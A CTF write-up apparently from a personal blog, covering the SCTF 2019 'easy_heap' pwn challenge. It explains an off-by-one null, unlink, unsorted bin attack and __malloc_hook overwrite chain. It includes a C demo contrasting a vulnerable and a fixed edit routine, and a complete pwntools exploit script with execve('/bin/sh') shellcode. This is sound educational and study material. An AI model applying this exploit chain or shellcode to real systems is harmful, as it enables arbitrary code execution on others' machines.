CTF: SCTF, June 2019

PWN

0x01 easy_heap

This challenge tests a lot of knowledge points at once: __malloc_hook, shellcode, the unsorted bin attack, unlink, and an off-by-one null.

Solution:

1. First, use the off-by-one null to trigger unlink, which lets us modify chunk_list in the bss segment.

2. With the bss segment under control, write the shellcode into the Mmap region.

3. Use the unsorted bin attack to overwrite the malloc pointer stored in bss, and rewrite its low byte to \x10, which pins down the location of __malloc_hook; then use fill to write the Mmap address straight into it.

4. Since the Mmap region is readable, writable and executable, the next malloc jumps straight to the Mmap region and we get a shell.
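The root cause that step 1 relies on is a write of one NUL byte past the end of a chunk's user data. The following is an added example (not the challenge binary's code and not part of the original writeup) that reproduces the effect on a simulated two-chunk layout: each chunk is 0x100 bytes with a 16-byte header, so the user region is 0xf8 bytes and buf[0xf8] is the low byte of the next chunk's size field. The vulnerable edit clears that byte (turning 0x101 into 0x100 and dropping PREV_INUSE); the hardened edit keeps the terminator inside the buffer. The chunk offsets are the ones the exploit's 0xf8 allocations produce; the byte array, `PREV_INUSE` constant and function names are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated glibc-style chunk layout (constructed for this example, not the
 * binary's real heap): two adjacent chunks of user size 0xf8, so each chunk
 * occupies 0x100 bytes including its 16-byte header (prev_size, size). */
#define CHUNK_SZ   0x100
#define USER_SZ    0xf8
#define PREV_INUSE 0x1

static uint8_t heap[2 * CHUNK_SZ];

/* Pointer to the size field of chunk i (8 bytes into its header). */
static uint64_t *chunk_size(int i) {
    return (uint64_t *)(heap + i * CHUNK_SZ + 8);
}

/* Lay out two in-use chunks; chunk0's user data starts at heap + 0x10. */
static void reset_heap(void) {
    memset(heap, 0, sizeof heap);
    *chunk_size(0) = CHUNK_SZ | PREV_INUSE;
    *chunk_size(1) = CHUNK_SZ | PREV_INUSE;
}

/* Vulnerable edit: copies up to `size` bytes, then writes a terminating NUL at
 * buf[n]. When n == size that is buf[0xf8], i.e. the low byte of the next
 * chunk's size field (the off-by-one null the writeup abuses). */
static void edit_vulnerable(uint8_t *buf, size_t size,
                            const uint8_t *src, size_t n) {
    if (n > size) n = size;
    memcpy(buf, src, n);
    buf[n] = 0;  /* one past the user region when n == size */
}

/* Hardened edit: reserve the last byte for the terminator, so it can never
 * land outside the buffer. */
static void edit_fixed(uint8_t *buf, size_t size,
                       const uint8_t *src, size_t n) {
    if (size == 0) return;
    if (n > size - 1) n = size - 1;
    memcpy(buf, src, n);
    buf[n] = 0;
}

/* Apply `edit` to chunk0 with a full-length input and report the size field
 * of chunk1 afterwards: 0x101 if intact, 0x100 if the NUL clobbered it. */
static uint64_t next_size_after(void (*edit)(uint8_t *, size_t,
                                             const uint8_t *, size_t)) {
    uint8_t input[USER_SZ];
    memset(input, 'a', sizeof input);
    reset_heap();
    edit(heap + 0x10, USER_SZ, input, sizeof input);
    return *chunk_size(1);
}

int main(void) {
    printf("vulnerable edit: chunk1 size = 0x%llx\n",
           (unsigned long long)next_size_after(edit_vulnerable));
    printf("fixed edit:      chunk1 size = 0x%llx\n",
           (unsigned long long)next_size_after(edit_fixed));
    return 0;
}
```

The cleared PREV_INUSE bit is what later makes free() trust the forged prev_size and fd/bk pointers placed in chunk0's data, so the fix is entirely about where the terminator is written: a bounded edit like `edit_fixed` leaves the neighbouring header untouched.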

```python
from pwn import *

context.log_level = "debug"
lib = ELF("libc.so.6")
sh = process("./easy_heap")
elf = ELF("easy_heap")


def add(size, ret):
    sh.recvuntil(">> ")
    sh.sendline("1")
    sh.recvuntil("Size: ")
    sh.sendline(str(size))
    if ret == 0:
        return 0
    else:
        sh.recvuntil("Address 0x")
        return int(sh.recv(12), 16)


def edit(idx, content):
    sh.recvuntil(">> ")
    sh.sendline("3")
    sh.recvuntil("Index: ")
    sh.sendline(str(idx))
    sh.recvuntil("Content: ")
    sh.sendline(content)


def delete(idx):
    sh.recvuntil(">> ")
    sh.sendline("2")
    sh.recvuntil("Index: ")
    sh.sendline(str(idx))


if __name__ == "__main__":
    sh.recvuntil("Mmap: 0x")
    Mmap = int(sh.recv(10), 16)
    chunk_list_head = 0x0000000000202068
    unlink_id = 3
    fastbin = add(0x10, 1)
    unsort_bin_1 = add(0x80, 1)
    unsort_bin_2 = add(0x80, 1)
    chunk0 = add(0xf8, 1)
    chunk1 = add(0xf8, 1)
    chunk2 = add(0xf8, 1)
    # ---- unlink
    payload = p64(0x110) + p64(0xf1) + p64(chunk0 - 0x18) + p64(chunk0 - 0x10)
    payload = payload.ljust(0xf0, "a")
    payload += p64(0xf0)
    edit(unlink_id, payload)
    delete(unlink_id + 1)
    chunk3 = add(0xf8, 1)
    base = chunk0 - chunk_list_head
    # ---- fill Mmap with shellcode
    payload = p64(0x500) + p64(Mmap) + p64(0xf8) + "\x60"  # idx=2 can't be freed
    edit(unlink_id, payload)
    edit(unlink_id - 1, "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05")
    # ---- fill __malloc_hook
    payload = p64(0x500) + "\x38"
    edit(unlink_id, payload)
    delete(1)
    edit(0, p64(fastbin + 0x10))
    add(0x80, 1)
    edit(3, p64(0) * 4 + p64(0x500) + "\x10")
    edit(2, p64(Mmap))
    input()
    add(0x80, 0)
    log.success("chunk3 :" + hex(chunk3))
    log.success("base :" + hex(base))
    log.success("unsort_bin_1 :" + hex(unsort_bin_1))
    log.success("Mmap :" + hex(Mmap))
    # log.success("__malloc_hook :" + hex(__malloc_hook))
    # gdb.attach(sh.pid)
    sh.interactive()
```
Author: 咲夜南梦
Link: http://yoursite.com/2019/06/25/CTF-SCTF-19%E5%B9%B46%E6%9C%88/
License: unless otherwise stated, all posts on this blog are released under the CC BY-NC-SA 4.0 license. When reposting, please credit 咲夜南梦's blog.